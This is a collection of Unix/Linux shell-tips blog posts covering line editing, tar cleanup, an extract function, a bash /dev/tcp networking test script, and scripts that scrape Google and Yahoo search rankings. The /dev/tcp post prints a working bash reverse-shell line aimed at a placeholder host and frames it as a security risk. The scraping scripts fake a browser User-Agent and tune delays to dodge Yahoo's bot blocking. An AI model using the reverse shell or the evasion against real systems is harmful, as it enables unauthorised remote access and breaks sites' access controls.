Tomorrow, we're going to complete the experiment we started in Monday's post on absorption of knowledge in the computer age, so, for today, we're just going to focus on a few little tricks that can save you grief, heartache, strife, worry and all those bad feelings people have to take prescription medication to deal with nowadays ;) Not to belittle chronic anxiety/depression (both symptoms treated with the same drugs) but, as fun as they may be, pharmaceuticals rarely actually solve a "mood disorder." And we use that term lightly. When we were kids, we were either happy, sad, pissed off or excited; any number of emotions that required no medication to correct. None of the kids in the neighborhood had ED, ADD, ADHD, LD's, or OCD's - They were all fussy, uninterested, spastic, stupid and had OCD's ;) Nowadays, too many kids have disorders and the meaning of the word has been devalued. We, here, all have CD's. We listen to them when we want to hear music. We will, of course, be asking our respective physicians about ways in which chemically altering ourselves can help us lose our CD's, and (hopefully) not feel compelled to buy new ones.. ;)

Sorry - no offense. We realize it's too late, but, if you have ADD, ADHD or any disorder of that nature, you'll get over this soon enough. Now, what the Hell was this post about, again? ;)

Oh yeah. A few little shell tricks to make your life easier so you can quit popping pills and jump-start the U.S. economy by drinking more :)

1. How to save yourself from having to retype a huge line that you thought you wanted to type, but, about at the end, you realized you couldn't enter until you typed a line preceding it, and you couldn't even tag that line to the beginning of the line you were already typing so you end up hitting ctl-C and typing the whole thing over again :

host # for x in a b c d e f g h i j k l m n o p q r s t u v w x y z ;do ps -ef|grep "[h]orse"|awk '{print $2}'|xargs ptree;don ^C


Rather than stand for that, just do the following thing whenever you log into your shell. Always make sure that you have line editing enabled. In bash, ksh, etc, if you want to enable vi line editing, all you need to do is type:

host # set -o vi

on the command line or, better yet, add it to your .bash_profile, .profile or .bashrc, so line editing will get set every time you log in and you won't have to always remember to do it. If you like emacs, just replace vi in the example above. This way, once you get to the end of that long line, you can type (literally):

[esc]0i#[enter]

That's the escape key (to get into vi command mode), the number 0 (to whisk you back to the beginning of the line), the letter i (to get you out of vi command mode and into insert mode) and the pound (#) symbol (to make the whole line a comment) and then the enter key. This will cause your line to become a comment, just like in a shell script and the shell won't execute it. Then you can type your preceding line and (assuming vi again) type:

[esc]kkx[enter]

Which is the escape key again (to get you into vi command mode), the "k" key twice to move you up two lines in your history (which goes from newest to oldest, bottom to top), the x key (to delete the # (pound) character) and then the enter key to have the shell execute your command line :) Yay! One down; one to go. Unfortunately, this won't work for shells that don't support line editing (like the Bourne shell, as opposed to most Linux sh's, which are usually just bash or dash).

2. How to clean up a huge mess when you untar a file that doesn't contain its own subdirectory. For instance, if you have this in your directory:

host # ls
file1.tar a b c d


and you untar file1.tar (which meets the above conditions), you might end up with this:

host # tar xpf file1.tar
file1.tar ab a bb b cb c db d x y z


and some of those new files might be directories with files in them, etc. This situation shouldn't be too bad, since you have very little in your directory. But sometimes, if you do it in /usr/local/bin (and, to add some more stress, can't rely on the file dates) this can create a very confusing situation. What do you get rid of without destroying everything?

There are a number of ways to get around this issue, but this one seems the fastest, with the least amount of hassle (feel free to combine the steps when you do this yourself; we're just keeping them apart for illustrative purposes):

To see what you've untarred (probably not necessary, but worth it if you happen to eyeball an important file you accidentally overwrote - another issue entirely ;)

host # tar tpf file1.tar
ab
bb
bb/a
cb/c/d
cb/c
db
x/y/z.txt
y/x
z


Now, you know what was in your original tar file and, therefore, what you should be deleting :) It's very simple to do, but we'd recommend you run this command once, like this:

host # echo $(ls -1d `tar tpf file1.tar`)

just to be sure, and (if that looks good) remove the tar file contents and then do whatever you want with the tar file (like extract it to another directory):

host # rm $(ls -1d `tar tpf file1.tar`)

Also, if your shell doesn't support the $() expansion operators, you can always backtick your internal backticks like so (or do something even more clever - there are probably more than a few ways to skin this cat ;):

host # rm `ls -1d \`tar tpf file1.tar\``
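
Of course, the easiest way to avoid the mess entirely (if you haven't already made it ;) is to extract into a scratch directory first and look things over before moving anything into place. Nothing fancy required:

host # mkdir scratch && cd scratch && tar xpf ../file1.tar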

We'll see you tomorrow for the reading experiment. SPOILER ALERT: It's not what you think it is, unless you think it's what it is ;)

Cheers,

, Mike







Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Thursday, February 12, 2009

When Features Attack: Bash Version 4.0.0(1)-rc1

How do?,

Before we get started today, I just wanted to reflect on our posts' introductions. Usually it's "Hey there," or something to that effect. Being one of those people who are bothered by redundancy (at least, after the 50th time ;) this is the one part of blog posting I find the most grating. And, since everything reminds me of a George Carlin quote, I think he put it pretty well in this little paragraph about saying goodbye to your fellow man (from "Napalm And Silly Putty"):

Then have you noticed this, you get in a rut with the way you say goodbye. You ever find yourself using the same phrase over and over again with everybody, you feel a little stupid. Like if you're leavin' a party, and you have to say goodbye to five people, you say, "OK, hey take it easy, OK, hey take it easy, OK, hey take it easy..", you feel like a goddamn moron, ya know? So you know what I do? Every month, I change the way I say goodbye. Whether I need to or not, every month I start using a different phrase. People notice that. They appreciate that extra effort. They'll say to me, "Pardon me, didn't you used to say, 'OK, hey take it easy'". I say, "Yes I did. but not anymore." Now I say "Farewell". Farewell 'til we meet again, Peace be with you. May the forces of evil become confused on the way to your house. That's a strong one, isn't it? People will remember you if you talk like that. Then sometimes you can combine certain ways to say goodbye that don't really seem to go together, like, "Toodle-oo, go with God, and don't take any wooden nickels." Then people don't know what the fuck you're talking about! Or you can say goodbye in a realistic manner. "So long Steve, don't let self-doubt interfere with plans to improve your life." Well, some people need practical advice.


Anyway, that being said, my options are somewhat limited, since I'm old enough to feel silly saying (or writing) things like "Word," or "What's the haps?" The first one is slang that just doesn't belong to my generation. I might find it amusing, but, at the same time, it seems like it might be confusing or taken the wrong way. The second one seems to have come around within the last year or so and, despite its down-home flavour and growing presence, I've yet to meet anyone who's actually ever said it and, to be quite honest, whenever I read that greeting in an email I mentally envision a middle-aged white man tragically out of touch with the youth culture of today and, also tragically, clamoring out in a weak last-ditch effort to stay hip. I pretty much understand everything most kids say to each other, but I've never felt the need to incorporate any of it into my own dialogue. The only exception is if I'm being sarcastic, which the kids pick up on immediately. They're not stupid and they can smell desperation. I would imagine that they (as I did when I was younger) look to the adults among them for some sense of normalcy, even in the form of language. As a parent, I don't discourage my kids from "fitting in," but I do try to provide a point of reference for them so they can go out into the world and speak intelligently to the older people that will be signing their paychecks (unless they're paying themselves, in which case they're either incredibly successful or possibly schizophrenic ;) Anyway, that being said (damn it! ...redundancy again ;), let's get on with this post. I'm getting farther and farther off-topic. It's a good thing I'm not getting paid for this ;)

On-topic (although this post is much less interesting than the Fox special where the latest build of bash mauls one of its handlers on film ;) I finally found some time and compiled version 4.0.0(1)-rc1 which, I believe, is the latest release out there right now (I could very well be wrong, as I completely missed 4.0-beta2). One of the first things I noticed when looking at the configurable options is that the ability to access the network via Bash's /dev/tcp networking functionality is now an actual option ( --enable-net-redirections ) to configure. When I saw this, I thought two things:

1. Although this used to be enabled by default (which sparked some controversy), now you have to specifically add it when you build. Of course, conversely, you can specifically exclude it, as before, which leads to the next point...

2. With regards to disabling the net redirection feature, I'm curious if it's a more secure implementation or if it's just being "recognized." Part of me figures that security issues will probably continue to exist with this feature, or it wouldn't be disabled by default. This way, anyone who wants to compile on their own, isn't aware of any of the security risks, and just does a robotic-build (./configure;make;make install - or, and I can't be certain of this, installs the default-build rpm, dpkg, pkg, etc) won't be vulnerable. I've seen a lot of debate on the blogs and boards about whether or not bash's implementation of net redirects is, in fact, a real security risk. For instance, labs.neohapsis.com has this nice online tutorial on how to connect back to the shell using bash net redirects. If you don't want to hop over there, I tested this with net redirects built into bash 4.0.0(1)-rc1 and it still works:

host # exec /usr/local/bin/bash 0</dev/tcp/host/514 1>&0 2>&0

HAPPY NOTE: If you're stuck with any bash version (or pre-compiled OS package), you can still - for the most part - disable bash's net redirect functionality (except in the case of the root user and/or anyone with equal system privilege) in, probably, more than one way. Check out our old post on securing /dev/tcp and /dev/udp if your OS allows you to set extended file access control lists. Restricting the permissions on /dev/tcp and /dev/udp to that extent doesn't actually remedy the underlying situation, but it does make it a lot harder to exploit.
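
If you just want a quick way to tell whether the bash you're running was built with net redirections at all, something like the line below should do it (a rough sketch - example.com and port 80 are only placeholders, and the test will also fail if the host simply isn't reachable from your box):

host # (exec 3<>/dev/tcp/example.com/80) 2>/dev/null && echo "net redirections work" || echo "no net redirections (or host unreachable)"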

I've included a combo-script (built from various older ones we've posted before) so that you can test your system/OS's behaviour when implementing this functionality with the latest version of bash. I'll probably be goofing around with this a lot in the near future ( although I promise not to bother you with every boring detail ;), as it could make some of our older bash scripts much tighter and outside-software-independent if it proves out.

Farewell 'til we meet again, Peace be with you. May the forces of evil become confused on the way to your house ;)

P.S. In the pictured output below, I used "www.tinyurl.com" for the httpserver variable so it would get the 301 redirect and you'd be able to see all the output from the script. If you run this script against "tinyurl.com" you'll get back the entire page, which runs a bit long.

Click on the picture below for the fun-sized version ;)

Output from bash net redirect script

Cheers,


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash
#
# httpg11
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

#
# Just edit these to your preferences -
# $domain should just be the domain.com part of your $mailserver address
#

mailserver="mail.domain.com"
domain="domain.com"
httpserver="www.tinyurl.com"

echo "Testing mail server functionality"
exec 9<>/dev/tcp/$mailserver/25
read -r server_version <&9
echo "Server reports it is: $server_version"
echo "HELO $domain" >&9
read -r greeting <&9
echo "Server responded to our hello with: $greeting"
echo "VRFY username" >&9
read -r vrfy_ok <&9
echo "Server indicates that this is how it feels about the VRFY command: $vrfy_ok"
echo "quit" >&9
read -r salutation <&9
echo "Server signed off with: $salutation"
echo "Dumping any remaining data in the file descriptor"
cat <&9 2>&1
echo "Closing input and output channels for the file descriptor"
9>&-
9<&-
echo "--------------------------------------------------"
echo "Testing web server functionality - Here it comes..."
exec 9<>/dev/tcp/$httpserver/80
echo "GET / HTTP/1.1" >&9
echo "Host: $httpserver" >&9
echo "Connection: close" >&9
echo "" >&9
while read line
do
echo "$line"
done <&9
echo "Dumping any remaining data in the file descriptor"
cat <&9 2>&1
echo "Closing input and output channels for the file descriptor"
9>&-
9<&-
echo "done"


, Mike







Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Monday, January 19, 2009

Extracting Different File Types On Linux And Unix - Guest Post

Hey there, everyone, hope you had a pleasant weekend :)

Today's Unix/Linux post is courtesy of TuxHelper and deals with the extraction of various types of compressed files in the bash shell. More specifically, it deals with setting up a very clever function that you can include in your .bashrc.

This little function is brilliant, in that it's so simple, obvious, and convenient that I can't believe I never thought to do it myself (I must be a glutton for punishment ;)

Hope you enjoy it and can "extract" some value from it (I really had to "push" that one ;)

Cheers, (and if anyone else out there would like to submit content and help me stave off that impending nervous collapse, please feel free to send me a comment :)





Thanks to "plb" on the debian forum for providing the tip/trick!

Open your .bashrc file, located in your /home/$USER/ directory. It is a "hidden file," as some like to call it in the GNU/Linux world. Assuming you have opened your file, find a spot to paste in the following text:


function extract()
{
    if [ -f "$1" ] ; then
        case "$1" in
            *.tar.bz2) tar xjf "$1" ;;
            *.tar.gz) tar xzf "$1" ;;
            *.tar.Z) tar xzf "$1" ;;
            *.bz2) bunzip2 "$1" ;;
            *.rar) unrar x "$1" ;;
            *.gz) gunzip "$1" ;;
            *.jar) unzip "$1" ;;
            *.tar) tar xf "$1" ;;
            *.tbz2) tar xjf "$1" ;;
            *.tgz) tar xzf "$1" ;;
            *.zip) unzip "$1" ;;
            *.Z) uncompress "$1" ;;
            *) echo "'$1' cannot be extracted." ;;
        esac
    else
        echo "'$1' is not a file."
    fi
}


Now go to your editor/notepad menu and save. The next time you have an archived file that needs to be opened, open a terminal/console and type (for example): extract myfile.zip





, Mike



Yannis Tsopokis had this to add - Turns out this is all a lot easier than I ever thought. I'm officially a dinosaur ;)


For Linux there is unp which chooses which utility will extract the file and calls it.

Yannis

A huge supporter of the Rox Desktop had this to add - perhaps now, the correct source will get proper attribution!


This is actually from http://roscidus.com/desktop/Archive

tgz = Extract('tgz', "gunzip -c - | tar xf -")
tbz = Extract('tar.bz2', "bunzip2 -c - | tar xf -")
tarz = Extract('tar.Z', "uncompress -c - | tar xf -")
rar = Extract('rar', "unrar x '%s'")
ace = Extract('ace', "unace x '%s'")
tar = Extract('tar', "tar xf -")
rpm = Extract('rpm', "rpm2cpio - | cpio -id --quiet")
cpio = Extract('cpio', "cpio -id --quiet")
deb = Extract('deb', "ar x '%s'")
zip = Extract('zip', "unzip -q '%s'")
jar = Extract('jar', "unzip -q '%s'")

Justin Li noted this very important point! Thanks for contributing, Justin!


Hi Mike,

I have been a follower of the Menagerie for a while; your posts have taught me quite useful things. For the extract script though, wouldn't it be better if the script used file to find the filetype instead of matching against the file name? Especially since in Linux the file extension is only a convention for humans, the output of file would be much more accurate.

Keep writing about Linux!

Justin
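
For anyone who wants to run with Justin's suggestion, here's a rough sketch of what that might look like, keying off the output of "file" instead of the extension. The mime-type strings are assumptions on my part and can vary between versions of the file utility (and a compressed tarball would need two passes this way), so check yours before relying on it:

function extract_by_type()
{
    if [ -f "$1" ] ; then
        case "$(file -b --mime-type "$1")" in
            application/x-bzip2) bunzip2 "$1" ;;
            application/x-gzip|application/gzip) gunzip "$1" ;;
            application/x-tar) tar xf "$1" ;;
            application/zip) unzip "$1" ;;
            application/x-rar) unrar x "$1" ;;
            *) echo "'$1' is not a type this function knows how to extract." ;;
        esac
    else
        echo "'$1' is not a file."
    fi
}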





Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Thursday, January 15, 2009

Bash script to find all of your indexed web pages on Google

Hey there,

Today's Linux and/or Unix bash script is a kind-of add-on for our original bash script to find your Google search index rank from last August (2008 - for those of you who might be reading this in some barren wasteland in a post-apocalyptic future where, for some inexplicable reason, my blog posts are still legible and being transmitted over the airwaves ...or delivered in paper format by renegade-postman Kevin Costner ;)

While the original script would search Google for any link to the URL you specified, based on a search of any number of keywords, or keyword phrases, you supplied (up to 1000 results, when Google cuts off), this one checks to see if your site is indexed by Google, and how heavily. I know that sounds like almost the exact same thing, but it's slightly different, I promise :)

This version (named "gxrank" since the original script was named "grank" and I needed to differentiate between the two in my bin directory and - I'll admit - I wasted not one ounce of imagination on the title ;) will accept a URL you supply and check Google's index for your site. It will then let you know how many pages, and which ones, are in Google's index.

While this might not seem like a valuable script to have, I use it a lot to test how fast I can put sites up for people and get them indexed. For instance, I might put up a site today and do all the standard SEO falderal. Of course, I won't run this script that night, but, usually by the next day, I'll be able to run this script and, at least, get back 1 result for the base URL. Then, over time, I can run this script (usually once per day, so I can feel impressed ;) and see how many pages on my site have been indexed. This script was, most specifically, made to track high-activity blogs (at least a post a day), but I use it for smaller sites, as well. If I put a site up that has 10 pages, it's nice to know when (or should I say if? ;) those 10 pages get fully indexed.

The usage for the script is fairly simple. You can run it from the Linux or Unix command line like:

host # ./gxrank yourUrl.com

You don't need to include the http:// or any other stuff. It's basically a regular expression match, so you can just include enough of a semi-URL to make sure you get back relevant results. You'll notice that I also only have it printing out the first 100 results maximum (you can modify this so it doesn't show you anything, if you want - I just like to see it). Google gives strange results when the number of returns is less than the maximum number of results on any given page. For example, it might list 38 index entries and then say that it got that many out of approximately 57 results. They're probably removing similar results but, ultimately, the exact number of index entries isn't all that important since it fluctuates often.
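
Under the hood, all the script is really doing is repeating a "site:" search and walking the results, so you can always sanity-check a single page of them by hand with a simplified version of the wget call the script makes (quoting the URL keeps the shell from eating the ampersands; the grep at the end just gives a rough count of result lines that mention your domain):

host # wget -q --user-agent=Firefox -O - "http://www.google.com/search?q=site:yourUrl.com&num=100&hl=en&safe=off" | grep -c "yourUrl.com"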

As a "for instance," below is the output of the script when run to check the indexed pages of gotmilk.com (Not for any particular reason; they were just the first site I ran across that didn't return more results than would fit on my screen ;)

Note: Click on the image below to "virtually experience" the bends ;)

gotmilk.com indexed pages on Google

Hope you enjoy this script and get some good use out of it. Sometimes just seeing your numbers grow can pick you up when you're ready to throw in the towel on your website :)

Cheers,

IMPORTANT NOTE: Although this warning is on the original Google search rank index page, it bears repeating here and now. If you use wget (as we are in this script), or any CLI web-browsing/webpage-grabbing software, and want to fake the User-Agent, please be careful. Please check this online article regarding the likelihood that you may be sued if you masquerade as Mozilla.


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash

#
# gxrank - how many pages does Google have in its index for you?
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

if [ $# -ne 1 ]
then
echo "Usage: $0 URL"
echo "URL with or with http(s)://, ftp://, etc"
exit 1
fi

url=$1
shift

base=0
start=0
not_found=0
search_string="site:$url"

echo "Searching For Google Indexed Pages For $url..."
echo

num_results=`wget -q --user-agent=Firefox -O - http://www.google.com/search?q=$search_string\&hl=en\&safe=off\&pwst=1\&start=$start\&sa=N|awk '{ if ( $0 ~ /of about <b>.*<\/b> from/ ) print $0 }'|awk -F"of about" '{print $2}'|awk -F"<b>" '{print $2}'|awk -F"</b>" '{print $1}'`

while :;
do
if [ $not_found -eq 1 ]
then
break
fi
wget -q --user-agent=Firefox -O - http://www.google.com/search?q=$search_string\&num=100\&hl=en\&safe=off\&pwst=1\&start=$start\&sa=N|sed 's/<a href=\"\([^\"]*\)\" class=l>/\n\1\n/g'|awk -v num=$num -v base=$base '{ if ( $1 ~ /^http/ ) print base,num++,$NF }'|awk '{ if ( $2 < 10 ) print "Google Index Number " $1 "0" $2 " For Page: " $3; else if ( $2 == 100 ) print "Google Index Number " $1+1 "00 For Page: " $3;else print "Google Index Number " $1 $2 " For Page: " $3 }'|grep -i $url
if [ $? -ne 0 ]
then
not_found=1
if [ $not_found -eq 1 ]
then
break
fi
else
break
fi

done

if [ $not_found -eq 1 ]
then
echo "Finished Searching Google Index"
echo
fi

echo "Out Of Approximately $num_results Results"
echo
exit 0


, Mike







Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Monday, December 29, 2008

Finding Your Yahoo Search Index Rank From The Unix Or Linux CLI

Hey There,

Today we're going to continue in our ongoing quest to rank highly in search engine results while simultaneously messing with them a lot ;) Previously, we've put out scripts to find your MSN search index rank from the CLI and to find your Google search index rank from the CLI. This is, of course, another script that, although it fits in the same category as the other two, is distinctive in several ways:

1. This time we're scouring Yahoo's search results.

2. The search results are being parsed differently, so that it makes it easier for the script to detect the point at which Yahoo cuts you off and won't let you do another search for a good 10 or 15 minutes.

3. The parsing code has been minimized, somewhat, so that it may actually be readable by humans who aren't pipe-chain-sed-awk-regular-expression fanatics ;)

4. See the continuation below for a very interesting analysis of Yahoo's robot-tolerance.

BUT FIRST, THIS VERY IMPORTANT NOTE: If you use wget (as we are in this script), or any CLI web-browsing/webpage-grabbing software, and want to fake the User-Agent, please be careful. Please check this online article regarding the likelihood that you may be sued if you masquerade as Mozilla, from the folks who maintain wget themselves.

This Yahoo script, of course, is only slightly different than the original Google and MSN scripts, although the differences are significant enough that most of the core was rewritten completely. The script, itself, operates the same way our Google and MSN search index page rank scripts do, insofar as executing it from the command line goes. There are, at least, three different ways you can call it. The most basic being:

host # ./yrank www.yourdomain.com all these key words

It doesn't matter if they're enclosed in double quotes or not. If you "really" want to get the double quote experience, you just need to backslash your double quotes.

host # ./yrank www.yourdomain.com \"all these key words\"

Other ways include creating files with the URL and keyword information (same format as the command line) and feeding them to the script's STDIN:

host # cat FILE|./yrank
host # ./yrank <FILE


Point 4 (continued from above): Yahoo robot search tolerance as compared with Google. This is actually quite interesting since, I believe, the general assumption is that Google is far less tolerant of seemingly-human interaction with its search than Yahoo is. However, in this case (and we've repeated this experiment over and over again) the opposite is, in fact, true. Check it out! :)

The setup is that we've created a simple file called "searchterms" to feed to both the grank and yrank scripts. It contains the following information:

host # cat searchterms
linuxshellaccount.blogspot.com unix linux
linuxshellaccount.blogspot.com linux unix
linuxshellaccount.blogspot.com unix and linux
linuxshellaccount.blogspot.com linux and unix
linuxshellaccount.blogspot.com unix
linuxshellaccount.blogspot.com linux
linuxshellaccount.blogspot.com perl script
linuxshellaccount.blogspot.com shell script


Then we put each search engine to the test, each grabbing results at 100 per page. You'll notice that the Google search engine makes it through the entire bunch without kicking us to the curb ;)

The image below was captured with a rear-view mirror and is, therefore, actually larger than it appears. Click below to see it in "life size" ;)

Google Robot Tolerance Test

And here is the exact same experiment, this time run against Yahoo's search engine. It ...just ...barely ...nope. It doesn't make it, again ;)

This image was taken in "Wallflower-Vision" - sometimes referred to as the "Shrinking-Violet Protocol." To see it in its natural, and unabashedly large, state, just click on it below and it will almost definitely come out of its corner ;)

Yahoo Robot Tolerance Test

Our initial suggestion is to change this line in the script (decreasing the number that you divide RANDOM by will increase the maximum wait time between tries):

let random=${RANDOM}/600


Dividing by 600 gives wait times of roughly 0 to 60 seconds; reducing that divisor to 300 roughly doubles the ceiling, for wait times of up to about two minutes, and so on. Bash's RANDOM variable always generates a value between 0 and 32767, so the divisor is the only knob you need to turn.
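
To put some numbers on that:

# bash's RANDOM spans 0 through 32767, so the divisor caps the pause:
#   32767 / 600 = 54  -> sleeps of roughly 0 to 54 seconds
#   32767 / 300 = 109 -> sleeps of roughly 0 to 109 seconds
let random=${RANDOM}/300
echo "waiting $random seconds..."
sleep $random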

Another possibility, which we didn't have time to fully test (so it's not included in the script), is that Yahoo may actually object to the direct manipulation of the GET request. It would probably respond more favorably if we extracted the URL for each successive request from the "Next" button on the search page, rather than moving on to the next valid (although coldly calculated) GET string to bring up the next set of 100 results. Time will tell. Experimentation is ongoing.
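
Just to sketch that idea out (completely untested, which is why it isn't in the script; the sed pattern and the $current_url variable are stand-ins, and Yahoo's actual markup will almost certainly need different massaging):

# Hypothetical, untested sketch: pull the href out of the results page's
# "Next" link and follow it, instead of hand-building the next b= offset.
# The pattern is an assumption about the markup, not Yahoo's real HTML.
next_path=`wget -O - "$current_url" 2>/dev/null|sed -n 's/.*<a href="\([^"]*\)">Next<\/a>.*/\1/p'|head -1`
if [ -n "$next_path" ]
then
current_url="http://search.yahoo.com${next_path}"
else
echo "No Next link found - out of results"
fi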

Hope you enjoy it, again, and that you're still enjoying the holidays. Even if none of them apply to your religious or moral belief-system, at least you get some paid time off of work :)

Cheers,


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash

#
# yrank - Get yer Yahoo's Out ;)
#
# 2008 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

if [ $# -lt 2 -a $# -ne 0 ]
then
echo "Usage: $0 URL Search_Term(s)"
echo "URL with or with http(s)://, ftp://, etc"
echo "Double Quote Search If More Than 1 Term"
exit 1
fi

if [ $# -eq 0 ]
then
while read x y
do
url=$x
search=$y
$0 $x "$y"
done
exit 0
else
url=$1
shift
search=$@
fi

search_terms=`echo $search|sed 's/ /+/g'`
start=1
count=1

echo "Searching for URL $url with search terms: $search"

results=`wget -O - http://search.yahoo.com/search?p=${search_terms}\&ei=UTF-8\&fr=yfp-t-501\&pstart=1\&b=$start 2>/dev/null|sed -n 2p 2>&1|sed 's/^.* of \([0-9,]*\) for .*$/\1/'`

while [ $start -lt 1001 ]
do
wget -O - http://search.yahoo.com/search?p=${search_terms}\&ei=UTF-8\&fr=yfp-t-501\&pstart=1\&b=$start\&n=100 2>&1|grep "error 999" >/dev/null 2>&1
screwed=$?
if [ $screwed -eq 0 ]
then
echo
echo "You have been temporarily barred due to excessive queries."
echo "Please change the \"random\" variable in this script to a"
echo "lower value, to increase wait time between queries, or take"
echo " 5 or 10 minutes before you run this script again!"
echo
exit 1
fi
wget -O - http://search.yahoo.com/search?p=${search_terms}\&ei=UTF-8\&fr=yfp-t-501\&pstart=1\&b=$start\&n=100 2>/dev/null|sed -n 2p 2>&1|sed 's/^.* of [0-9,]* for //'|sed 's/<[^>]*href="\([^"]*\)"[^>]*>/\n\1\n/g'|sed -e :a -e 's/<[^>]*>//g;/</N;//ba'|grep "^http"|sed '/^http[s]*:\/\/[^\.]*\.*[^\.]*\.yahoo.com/d'|sed '/cache?ei/d'|uniq|while read line
do
echo "$line"|grep $url >/dev/null 2>&1
yes=$?
if [ $yes -eq 0 ]
then
echo "Result $count of approximately " $results " results for URL:"
echo "$line"
exit 1
else
let count=$count+1
fi
done
end=$?
if [ $end -eq 1 ]
then
exit 0
else
let start=$start+100
let count=$count+100
let new_limit=$start-1
let random=${RANDOM}/600
echo "Not in first $new_limit results"
echo "waiting $random seconds..."
sleep $random
fi
done


, Mike




Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Tuesday, December 23, 2008

We'll Be Moving Soon: Unix and Linux Lame Encryption Decoded

Hey there,

There are still several hours left to go on the poll (which may be closed at the time of publishing) as I write this post, but (unless something insane happens) it looks as though our desire to remove ourselves from blogspot agrees with the opinion of about 77 percent of the folks who took the time to vote. I won't go through all the reasons things will be better once we get our own URL, although I will provide a handy link back to the original post where we laid out our reasons for moving on to our own host. Once things get ironed out (which should be well before we actually "do" move), the switch will be made. Hopefully, we'll be able to either maintain both sites at once or Google will be good enough to allow us to keep this domain and redirect from it for a while (for free or for a fee; however they do it).

NOTE: If you're one of the potentially thousands of people who stop by here every once in a while (and you haven't written in yet), we'll be putting up a limited subscription email form (you can always email us via the "Send Me A Comment" link at the top right of every page) as soon as possible. To be 100 percent clear, the "limited" part means that it won't be up forever AND that the subscription (as is so often referenced on many white/black/grey-hat marketing sites on the net) is "limited" in that you'll get one email (announcing our new address, and any other information pertinent to the move), after which you will be automatically unsubscribed. This is a one-shot email deal and your email address will not be sold or traded in any way. You always have the option of just following the site, as we should be posting information about the move, as we get it, right here. We probably have something to gain by collecting a bunch of email addresses, but if we ever want to sell you something, we'll let you know that we're trying to sell you something. Wanna buy a bridge? ;)

More on that, as it comes. It appears as though we have some work to do over the holidays. In the end, this move should result in a better experience for both the reader and everyone here, since we'll be able to avail ourselves of conveniences not possible under our current setup. We thank Google for helping us get our start for zero dollars per month, but now it's time for us to move on.

And, to wrap up, since nobody replied regarding our previous confusion and lame encryption treasure-hunt post, we got lucky and don't have to pony up the prize right away ;) Although, rest assured, on our new site, there will be revision upon revision of our cable TV script, in real-time, as we're able to update it in our CVS repository. We have a personal stake in seeing this through because, after having it work so well for a month, many of us have become entirely dependent on it. Zap2it may have changed their format (and will probably do so again), but we can modify how we extract the information. Also, TVGuide would be a good alternate source of information for getting instant television listings.

BTW, the original script was our Google search index rank script, compressed and goofed around with (although not made unworkable) via methods posted in our series on security through obfuscation and, finally, made even more confusing using our script to do lame encryption using od. Check it out. Why would we lie ;)
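
For the curious, the last step of that (the octal dump itself) is, at heart, just an od run; the perl script from the older post dresses it up a bit more, so treat this as the general idea only (the filename here is just a placeholder):

# The general idea behind the octal blob in the post below (not the original
# perl script): -An drops the address column and -b prints each byte as a
# 3-digit octal value, 16 to a line - the same shape as the dump you'll see.
od -An -b obfuscated_one_liner.sh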

In closing, we're looking forward to the move and will put up a mail form as soon as possible. If you prefer, again, just send us email via the "Send Me A Comment" link at the top right of every post if you wish to be notified when the terms of the move are finalized, or you just have a gripe ;)

Cheers :)

, Mike




Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Friday, December 19, 2008

Confusion And Lame Encryption On Linux And Unix

Hey there,

Today, since the holidays are bringing me so much joy (heavy, heavy sarcasm ;), I thought it would be fun to write a post that makes use of some of the principles we've posted on this blog over the past year and combine them to create a treasure hunt of sorts. Actually, a lot of my holiday posts are going to be a little experimental. Since readership goes way down during the holiday season, it's a great time to write less conservative posts. Who knows what I'll be able to get away with? Not me; but I can't wait to find out :)

This isn't an ordinary treasure hunt, of course. No buried treasure or, really, anything of value at the end (Sometimes, I think I missed my calling in life when I passed on being a motivational speaker ;). Not much more than the pride in the knowledge that you figured it out and/or the passive-aggressive loathing you'll feel as you obsess over how I'm not so clever as I think, after all (although, hate me in moderation. You don't want to forget to stick another pin in my effigy before you burn it). This is quickly turning into a very dark post ;)

Of course, I, like most people I know who are around my age and have families of their own, dread the holidays. I love the fact that my kids are having fun, but the women (no offense, ladies...) in my family take this whole shebang way too seriously and the long hard journey to the day after the day after Christmas almost always includes at least one emotional breakdown, semi-psychotic episode or in-fighting about who did what better than whom and enlightening conversations that begin with "can you believe what he/she ...blah, blah, blah." I think if we all just got back to the commercialism that the holidays are really all about, everything would be perfectly fine and we'd all be happy again.

Here's a good tip, that I've found always serves the user well: Whenever I start to feel like I'm going to kill a relative during the peak of the festivities, I think to myself: What would Jesus do? I pause, reflect and then just figure "screw it" and try to get on with my life ;)

Anyway, before I lift your spirits up too high, here's what I've got for you today (hint: the next few lines are laden with clues. All that stuff above was crazy talk. And, if you're a family member of mine, of course I didn't mean a word of it ;) The jumble of numbers that looks like an octal dump was encrypted using a perl script that we posted to this blog some time ago. Of course, the encrypted bash script has had its name and attribution removed so those of you who can read octal won't get off easy ;) The script itself is all mashed together using a security method we've practiced in a few posts on this blog, which makes scripts less likely to be mucked with by compressing them and, essentially, making them really long one-liners.
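
And, if reading octal in your head isn't your bag, here's one generic way to turn a space-separated octal dump back into text (this is emphatically not the original perl script from that earlier post, and "encoded.txt" is just whatever file you paste the blob into):

# Generic octal-to-text decoder - not the script from the earlier post.
# oct() turns each whitespace-separated value back into a number, and
# chr() turns that number back into a byte.
perl -ne 'print map { chr(oct($_)) } split' encoded.txt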

If you figure out what the script is and can email me the name (which is listed in the post that the obfuscated and lame-encrypted script originally came from; in the script headers - plain as day), I'll rewrite cabletv.sh for you, since zap2it changed their output format a month after our reader base (and this is impressive, I think) began apparently kicking the cr## out of them 24x7 (on top of the massive count of regular folk who used it through a web browser, as it was intended to be viewed). My apologies to zap2it, of course. Hopefully, they're not too upset. Really, I'd be ecstatic if I could get a Google PR of 7 and an Alexa Rank of 2,977 with 253,590 backlinks (I'm just guesstimating ;).

